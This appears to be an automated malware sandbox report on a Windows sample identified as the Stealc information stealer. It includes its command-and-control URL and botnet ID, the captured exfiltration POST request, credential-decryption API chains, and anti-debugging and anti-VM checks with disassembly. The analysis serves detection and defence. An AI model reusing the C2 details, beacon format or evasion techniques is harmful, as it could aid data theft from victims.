Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1532850
MD5: 10f4beb1c5f54bb1d754f56785e14563
SHA1: c52cb5d5917e28fd1d886ddbe410bb673617e16c
SHA256: 58faf6bf840c606c3c8852692bb7f9ae649fa927707f5546d55e68ba6c4fe8b2
Tags: exeuser-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locale information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 5176 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 10F4BEB1C5F54BB1D754F56785E14563)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development builds on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000003.2214050807.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2254739103.0000000000838000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 5176 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 5176 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.de0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-14T01:00:20.306858+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49717 | 185.215.113.37 | 80 | TCP

                AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.de0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00DEC820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DE9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00DE9AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DE7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00DE7240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DE9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00DE9B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00DF8EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00DF38B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DF4910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00DEDA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00DEE430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00DF4570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00DEED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DE16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DE16D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DEF6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00DF3EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00DEBE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DEDE10

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49717 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----JKECGHCFIJDAAKFHJJDH
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Ascii:
    ------JKECGHCFIJDAAKFHJJDH
    Content-Disposition: form-data; name="hwid"

    4ACFF39BB3583419705248
    ------JKECGHCFIJDAAKFHJJDH
    Content-Disposition: form-data; name="build"

    doma
    ------JKECGHCFIJDAAKFHJJDH--
Source: Joe Sandbox View | IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DE4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00DE4880
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 (same headers and multipart body as the global traffic POST listed above)
Source: file.exe, 00000000.00000002.2254739103.000000000081E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2254739103.0000000000884000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2254739103.0000000000884000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2254739103.0000000000896000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2254739103.0000000000884000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php-
Source: file.exe, 00000000.00000002.2254739103.0000000000884000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php?
Source: file.exe, 00000000.00000002.2254739103.0000000000884000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpi
Source: file.exe, 00000000.00000002.2254739103.000000000081E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37p

                System Summary

Source: file.exe | Static PE information: section name: (empty name)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty name)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011AF9A9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011351D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011A7339
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0108BB50
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010D8367
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011A229B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0119FAA2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F52ED
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011115D4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011A3DC1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011B1418
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010CBC61
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01060CEB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011B2E2B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011ADEA3
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00DE45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: siqapmbg ZLIB complexity 0.9949494235985533
Source: file.exe, 00000000.00000003.2214050807.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00DF8680
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00DF3720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\ZEDEI543.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1854976 > 1048576
Source: file.exe | Static PE information: Raw size of siqapmbg is bigger than: 0x100000 < 0x19ec00

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.de0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;siqapmbg:EW;dgzgzabs:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;siqapmbg:EW;dgzgzabs:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00DF9860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c55c8 should be: 0x1d04b1
Source: file.exe | Static PE information: section name: (empty name)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty name)
Source: file.exe | Static PE information: section name: siqapmbg
Source: file.exe | Static PE information: section name: dgzgzabs
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0123292D push ebx; mov dword ptr [esp], ecx 0_2_0123297C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0126F932 push ecx; mov dword ptr [esp], 1DDB1E86h 0_2_0126F957
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0126F932 push 16BEE169h; mov dword ptr [esp], eax 0_2_0126F9BC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0126F932 push 353121A9h; mov dword ptr [esp], eax 0_2_0126F9D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012BA91F push 720EEB00h; mov dword ptr [esp], eax 0_2_012BA95E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01294965 push 7ADD2895h; mov dword ptr [esp], eax 0_2_0129498A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01294965 push 2D3D02FCh; mov dword ptr [esp], esp 0_2_012949AC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0121A17B push 3308ABD7h; mov dword ptr [esp], edx 0_2_0121A1C3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0123994D push ebp; mov dword ptr [esp], ebx 0_2_0123995E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0123994D push edx; mov dword ptr [esp], ecx 0_2_01239969
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011E81BF push edx; mov dword ptr [esp], 7F7F8C1Fh 0_2_011E81E2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01274984 push ebp; mov dword ptr [esp], esi 0_2_0127498F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011AF9A9 push 6CC68142h; mov dword ptr [esp], edx 0_2_011AF9C5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011AF9A9 push 09DFD4D4h; mov dword ptr [esp], eax 0_2_011AFA55
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011AF9A9 push esi; mov dword ptr [esp], ebx 0_2_011AFAA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011AF9A9 push ecx; mov dword ptr [esp], edx 0_2_011AFAEA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011AF9A9 push 1CFDA9D4h; mov dword ptr [esp], ebp 0_2_011AFB35
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011AF9A9 push 3E7A94C6h; mov dword ptr [esp], esi 0_2_011AFBBB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011AF9A9 push edi; mov dword ptr [esp], ecx 0_2_011AFBEB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011AF9A9 push 019FD919h; mov dword ptr [esp], edi 0_2_011AFC22
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011AF9A9 push 590119ACh; mov dword ptr [esp], esi 0_2_011AFD7A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011AF9A9 push 1E727620h; mov dword ptr [esp], edi 0_2_011AFD82
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011AF9A9 push ebx; mov dword ptr [esp], edx 0_2_011AFDC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011AF9A9 push esi; mov dword ptr [esp], 6FBBAE36h 0_2_011AFDC4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011AF9A9 push 4B2E5D49h; mov dword ptr [esp], eax 0_2_011AFE7B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011AF9A9 push 4863E733h; mov dword ptr [esp], ebp 0_2_011AFED9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011AF9A9 push 3FA4C0C6h; mov dword ptr [esp], esp 0_2_011AFEE1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011AF9A9 push 1F7F5316h; mov dword ptr [esp], edx 0_2_011AFEFB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011AF9A9 push edi; mov dword ptr [esp], ebp 0_2_011AFF3A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011AF9A9 push edi; mov dword ptr [esp], edx 0_2_011B002B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011AF9A9 push 6948C7A9h; mov dword ptr [esp], edx 0_2_011B0040
Source: file.exe | Static PE information: section name: siqapmbg entropy: 7.954494499000927

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00DF9860

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess graph_0-13567
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10423E0 second address: 10423E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11B8C62 second address: 11B8C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F3FAC75ECC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11B8FDA second address: 11B8FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11B8FDE second address: 11B9001 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3FAC75ECC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b ja 00007F3FAC75ECC6h 0x00000011 je 00007F3FAC75ECC6h 0x00000017 popad 0x00000018 popad 0x00000019 js 00007F3FAC75ECDAh 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11B9001 second address: 11B900B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3FACB96B26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11B952B second address: 11B952F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11B952F second address: 11B9533 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11B9533 second address: 11B9539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11BD199 second address: 11BD1A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACB96B2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11BD1A8 second address: 11BD258 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b or dword ptr [ebp+122D2A7Ch], esi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007F3FAC75ECC8h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D19CCh], ebx 0x00000033 call 00007F3FAC75ECC9h 0x00000038 jmp 00007F3FAC75ECD0h 0x0000003d push eax 0x0000003e jl 00007F3FAC75ECD4h 0x00000044 push eax 0x00000045 jmp 00007F3FAC75ECCCh 0x0000004a pop eax 0x0000004b mov eax, dword ptr [esp+04h] 0x0000004f push eax 0x00000050 push edi 0x00000051 jmp 00007F3FAC75ECD4h 0x00000056 pop edi 0x00000057 pop eax 0x00000058 mov eax, dword ptr [eax] 0x0000005a jc 00007F3FAC75ECD8h 0x00000060 jc 00007F3FAC75ECD2h 0x00000066 jmp 00007F3FAC75ECCCh 0x0000006b mov dword ptr [esp+04h], eax 0x0000006f push eax 0x00000070 push edx 0x00000071 jl 00007F3FAC75ECC8h 0x00000077 push eax 0x00000078 pop eax 0x00000079 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11BD258 second address: 11BD25E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11BD25E second address: 11BD262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11BD262 second address: 11BD2CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 jmp 00007F3FACB96B2Bh 0x0000000e sbb si, 4D0Bh 0x00000013 push 00000003h 0x00000015 jmp 00007F3FACB96B34h 0x0000001a push 00000000h 0x0000001c call 00007F3FACB96B2Fh 0x00000021 jg 00007F3FACB96B28h 0x00000027 mov ch, 18h 0x00000029 pop esi 0x0000002a push 00000003h 0x0000002c xor dh, FFFFFFF3h 0x0000002f call 00007F3FACB96B29h 0x00000034 push ebx 0x00000035 push ebx 0x00000036 jmp 00007F3FACB96B2Bh 0x0000003b pop ebx 0x0000003c pop ebx 0x0000003d push eax 0x0000003e push esi 0x0000003f push ecx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11BD2CD second address: 11BD338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jmp 00007F3FAC75ECD3h 0x00000010 jmp 00007F3FAC75ECD7h 0x00000015 popad 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 jmp 00007F3FAC75ECD3h 0x0000001e jmp 00007F3FAC75ECD6h 0x00000023 popad 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push ecx 0x00000029 push ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11BD338 second address: 11BD390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop eax 0x00000007 mov dword ptr [ebp+122D217Ch], ebx 0x0000000d lea ebx, dword ptr [ebp+1244F07Bh] 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F3FACB96B28h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d add cl, 00000029h 0x00000030 xchg eax, ebx 0x00000031 push eax 0x00000032 jmp 00007F3FACB96B37h 0x00000037 pop eax 0x00000038 push eax 0x00000039 push ecx 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
